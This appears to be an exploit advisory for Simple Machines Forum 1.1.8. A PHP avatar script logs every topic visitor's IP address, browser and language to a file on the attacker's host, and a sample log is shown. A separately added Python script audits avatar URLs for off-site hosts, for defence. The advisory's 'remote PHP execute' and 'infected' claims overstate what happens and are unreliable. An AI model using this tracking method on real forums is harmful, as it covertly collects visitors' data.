Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC

bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- About Vulnerability:

This vulnerability allows an external PHP file to be executed for any visitor of the forum.
The PHP file should contain the malicious code. The scope of the attack depends on the strength of the PHP file.

- Step by Step:

1) Go to the avatar section of your profile.
2) Put the URL of the malicious PHP file as the avatar (ex: http://target/poc.php).
3) Create a new topic.

- [victims] All the people that visit the topic will be infected.

malicious file example [steal info]: (poc.php)

<?php
// Request metadata of the visitor whose browser fetched the avatar URL
$ip = $_SERVER['REMOTE_ADDR'];
$so= $_SERVER['HTTP_USER_AGENT'];
$lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
// Path of this script on the server that hosts it
$url= $_SERVER['PHP_SELF'];
$path= $_SERVER['DOCUMENT_ROOT'];

// Append one record per request to the log file
$archivo = 'hacks.txt';
$fp = fopen($archivo, "a");
$string = "
Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
by Jose Luis Gongora Fernandez (aka) JosS

$path$url

VICTIM: $ip
info: $so
language: $lan
";
$write = fputs($fp, $string);
fclose($fp);
?>

------END-----

cat hacks.txt

Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
by Jose Luis Gongora Fernandez (aka) JosS

/***/***/vhosts/hack0wn.com/httpdocs/poc.php

VICTIM: 88.25.92.***
info: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.19) Gecko/20081202 Iceweasel/2.0.0.19 (Debian-2.0.0.19-0etch1)
language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3

// tested on smf 1.1.8

__h0__
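Added example (not part of the original advisory): a forum administrator's audit of stored avatar URLs, flagging the ones that make every topic visitor's browser request an off-site host, as the http://target/poc.php avatar above does. FORUM_HOST, the function names and the sample rows are assumptions constructed for illustration; in practice the rows would come from an export of member names and avatar values.

```python
from urllib.parse import urlsplit

FORUM_HOST = "forum.example"            # assumption: the forum's own hostname
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif")

def classify_avatar(url, forum_host=FORUM_HOST):
    """Classify one avatar value as 'local', 'external-image' or 'external-suspect'."""
    parts = urlsplit(url.strip())
    if not parts.scheme and not parts.netloc:
        return "local"                  # server-stored avatar (relative path)
    if parts.scheme not in ("http", "https"):
        return "external-suspect"       # protocol-relative or unexpected scheme
    if (parts.hostname or "").lower() == forum_host:
        return "local"
    # An image extension says nothing about what the remote server runs; it only
    # separates ordinary hotlinks from URLs that openly point at a script.
    if parts.path.lower().endswith(IMAGE_EXTS) and not parts.query:
        return "external-image"
    return "external-suspect"

def audit(rows, forum_host=FORUM_HOST):
    """Return (member, url, verdict) for every non-local avatar, suspects first."""
    findings = [(m, u, classify_avatar(u, forum_host)) for m, u in rows]
    findings = [f for f in findings if f[2] != "local"]
    return sorted(findings, key=lambda f: (f[2] != "external-suspect", f[0]))

# Constructed sample rows: (member name, stored avatar value)
SAMPLE_ROWS = [
    ("alice", "avatars/Actors/smiley.gif"),
    ("bob",   "http://target/poc.php"),          # URL form used in the advisory
    ("carol", "https://img.example/u/7.PNG"),
    ("dave",  "http://forum.example/avatars/dave.jpg"),
    ("erin",  "http://img.example/a.png?uid=5"),
]

if __name__ == "__main__":
    for member, url, verdict in audit(SAMPLE_ROWS):
        print(f"{verdict:17} {member:6} {url}")
```

Any avatar reported here, including "external-image", exposes each visitor's IP address, User-Agent and Accept-Language to the remote host, which is exactly what hacks.txt records; serving avatars only from the forum's own storage removes that request.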